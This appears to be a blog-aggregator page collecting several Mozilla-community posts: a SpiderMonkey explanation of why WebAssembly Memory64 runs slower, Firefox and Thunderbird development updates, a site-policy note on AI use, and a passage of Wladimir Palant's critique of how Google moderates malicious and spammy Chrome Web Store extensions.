Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

Spidermonkey Development BlogIs Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal1.

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load2. You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load3:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 sextillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses4.

Even a 48-bit memory is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

By reserving 4GB of memory for all 32-bit WebAssembly modules, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely5.

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.

Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et. al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

Don MartiHow this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox NightlyKey Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] Added $$$ , a console helper that retrieve elements from the document, including those in the ShadowDOM (#1899558)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can access this menu from the cog button in about:addons
    • The "Manage Extension Shortcuts" pane from about:addons. A series of keyboard shortcut mappings for an extension is displayed - one of which is mapped to the F19 key.

      You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys are still going to be invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This layout changes how stories are laid out (new modular layouts instead of the same medium cards, some sections organized into categories)
    • Try it out yourself in Nightly by setting the following to TRUE
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has been now merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 is tracking fixing an AttributeError being hit by mach xpcshell-test as a side-effect of changes applied by Bug 1661935, until the fix is landed mach test is a short-term workaround to run xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the addon file to the device using base 64, which allowed to enable installing extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which sometimes was set to 0 unexpectedly (#1931514). Prior to that, Julian added a small workaround to fallback on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it shipped for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits, the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain svg favicons being wrongly picked, and thus having a bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158 

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new –page-main-content-width design token which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla ThunderbirdThunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

Progress on the global database project was significant in the tail end of 2024, with foundational components taking shape. The team has implemented a database for folder management, including support for adding, removing, and reordering folders, and code for syncing the database with folders on disk. Preliminary work on a messages table and live view system is underway, enabling efficient filtering and handling of messages in real time. We have developed a mock UI to test these features, along with early documentation. Next steps include transitioning legacy folder and message functionality to a new “magic box” system, designed to simplify future refactoring and ensure a smooth migration without a disruptive “Big Bang” release.

Encryption

The future of email encryption has been on our minds lately. We have planned and started work on bridging the gap between some of the factions and solutions which are in place to provide quantum-resistant solutions in a post-quantum world. To provide ourselves with the breathing room to strategize and bring stakeholders together, we’re looking to hire a hardening team member who is familiar with encryption and comfortable with lower level languages like C. Stay tuned if this might be you!

In-App Notifications

With phase 1 of this project complete, we uplifted the feature to 134.0 Beta and notifications were shared with a significant number of users on both beta and daily releases in December. Data collected via Glean telemetry uncovered a couple of minor issues that have been addressed. It also provided peace of mind that the targeting system works as expected. Phase 2 of the project is well underway, and we have already uplifted some features and now merged them with 135.0 BetaMeta Bug & progress tracking.

Folder & Message Corruption

In the aftermath of our focused team effort to correct corruption issues introduced during our 2023 refactoring and solve other long-standing problems, we spent some time in self-reflection to perform a post mortem on the processes, decisions and situations which led to data loss and frustrations for users. While we regret a good number of preventable mistakes, it is also helpful to understand things outside of our control which played a part in this user-facing problem. You can find the findings and action plan here. We welcome any productive recommendations to improve future development in the more complex and arcane parts of the code.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

As usual, if you want to see things as they land, and help us squash some early bugs, you can always check the pushlog and try running daily, which would be immensely helpful for catching things early.

See you next month after FOSDEM!

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – December 2024 appeared first on The Thunderbird Blog.

Wladimir PalantChrome Web Store is a mess

Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s for example. No, Microsoft is probably even worse but I never bothered finding out. That’s because Microsoft Edge doesn’t matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?

Screenshot of the Chrome download page. A subtitle “Extend your experience” is visible with the text “From shopping and entertainment to productivity, find extensions to improve your experience in the Chrome Web Store.” Next to it a screenshot of the Chrome browser and some symbols on top of it representing various extensions.

Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.

As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.

Google employees will certainly disagree with me. Sadly, much of it is organizational blindness. I am certain that you meant it well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for the end users the result is a huge (and rather dangerous) mess.

Some recent examples

Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after I reported it to them. Google on the other hand took two weeks where they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:

Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.

So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.

In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives their users on the number of trees they supposedly plant, incentivizing users into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.

Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured” and it still advertises the very same completely made up numbers of trees they supposedly planted. Google even advertises for the extension, listing it in the “Editors’ Picks extensions” collection, probably the reason why it gained some users since my report. So much about being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but was already removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.

But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money they claim to spend on a good cause. So also in October I wrote about the Karma extension spying on users. Users are not being notified about their browsing data being collected and sold, except for a note buried in their privacy policy. Certainly, that’s identical to the Avast case mentioned before and the extension needs to be taken down to protect users?

Screenshot of a query string parameters listing. The values listed include current_url (a Yahoo address with an email address in the query string), tab_id, user_id, distinct_id, local_time.

Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged, it will still notify their server about every web page you visit (see screenshot above). The users still aren’t informed about this. Yet their Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point but now it is back.

Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.

Mind you, neither refoorest nor Karma were alone but rather recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling their users) was allowed to remain for some reason.

With refoorest, most affiliate extensions were removed or stopped using their Impact Hero SDK. Yet when I checked more than two months after my report two extensions from my original list still appeared to include that hidden affiliate fraud functionality and I found seven new ones that Google apparently didn’t notice.

The reporting process

Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:

Screenshot of an email: Hello Developer, Thank you again for reporting these items. Our team is looking into the items  and will take action accordingly. Please refer to the  possible enforcement (hyperlinked) actions and note that we are unable to comment on the status of individual items. Thank you for your contributions to the extensions ecosystem. Sincerely, Chrome Web Store Developer Support

This is by the way the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions got removed while other extensions with identical functionality were available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.

Supposedly, the idea of not commenting on policy enforcement actions is hiding the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or due to the adjustments demanded by Google. It’s only me, the reporter of these issues, who needs to be guessing.

But, and this is a positive development, I’ve received a confirmation that both these reports are being worked on. This is more than I usually get from Google which is: silence. And typically also no visible reaction either, at least until a report starts circulating in media publications forcing Google to act on it.

But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes their policies, there should be an obvious way?

In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.

If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.

Sounds good, right? Except that the first option says:

At the bottom left of the window, click Flag Issue.

Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:

Screenshot of a web form offering a choice from the following options: Did not like the content, Not trustworthy, Not what I was looking for, Felt hostile, Content was disturbing, Felt suspicious

This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:

Your abuse report has been submitted successfully.

No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.

Well, there is another option listed in the document:

If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.

Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t that. If we try the form nevertheless it gives us a promising selection:

Screenshot of a web form titled “Select the reason you wish to report content.” The available options are: Policy (Non-legal) Reasons to Report Content, Legal Reasons to Report Content

Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:

Screenshot of a web form titled “Select the reason you wish to report content.” The only available option is: Child sexual abuse material

That’s really the only option offered. And I have questions. At the very least those are: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And: since when is that the only policy that Chrome Web Store has?

We can go back and try “Legal Reasons to Report Content” of course but the options available are really legal issues: intellectual properties, court orders or violations of hate speech law. This is another dead end.

It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean: I get it that Google must be getting lots of non-sense reports. And they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.

In 2019 Google launched the Developer Data Protection Reward Program (DDPRP) meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste, pretty much no issue would qualify for the program. But at least it was a reliable way to report issues which might even get forwarded internally. Unfortunately, Google discontinued this program in August 2024.

It’s not that I am very convinced of DDPRP’s performance. I’ve used that program twice. First time I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. The report was deemed out of scope for the program but forwarded internally. The extension was then removed quickly, but that might have been due to the media coverage. The benefit of the program was really: it was a documented way of reaching a human being at Google that would look at a problematic extension.

Chrome Web Store and their spam issue

In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.

I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions are likely to turn malicious as well once they have sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.

And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google was made aware of this particular trick a year before my blog post already. And again, for some reason Google chose not to act.

Can extension reviews be trusted?

So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:

Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.

And the important part in the terms of service is:

Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.

Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, with their continuous stream of incoming five star reviews.

A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five star reviews on a single day in September – and only a single (negative) review since then. I pointed out that it is a consistent pattern across all extensions of this account, e.g. another extension (merely 30 users) received 9 five star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.

Screenshot of seven reviews, all giving five stars and all from September 19, 2024. Top review is by Sophia Franklin saying “solved all my proxy switching issues. fast reliable and free.” Next review is by Robert Antony saying “very  user-friendly and efficient for managing proxy profiles.” The other reviews all continue along the same lines.

And it isn’t only fake reviews. The refoorest extension incentivizes reviews which violates Google’s anti-spam policy (emphasis mine):

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.

It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.

With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes it’s the overwhelmingly positive or meaningless content. At this point, any user ratings with the average above 4 stars likely have been messed with.

The “featured” extensions

But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. At least Google’s announcement indeed suggests a manual review:

Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:

  1. Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
  2. A store listing page that is clear and helpful for users, with quality images and a detailed description.

Yet looking through 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions as Google claims, it cannot really be thorough.

To provide a more tangible example, Chrome Web Store currently has Blaze VPN, Safum VPN and Snap VPN extensions carry the “Featured” badge. These extensions (along with Ishaan VPN which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN which was removed from Chrome Web Store in 2021. And they also don’t even work, no connections succeed. The extension not working is something users of Nucleus VPN complained about already, a fact that the extension compensated with fake reviews.

So it looks like the main criteria for awarding the “Featured” badge are the things which can be easily verified automatically: user count, Manifest V3, claims to respect privacy (not even the privacy policy, merely that the right checkbox was checked), a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on the user interface and generally extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.

In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge. That’s because the website algorithm seems to weigh the badge considerably towards the extension’s ranking.

How did Google get into this mess?

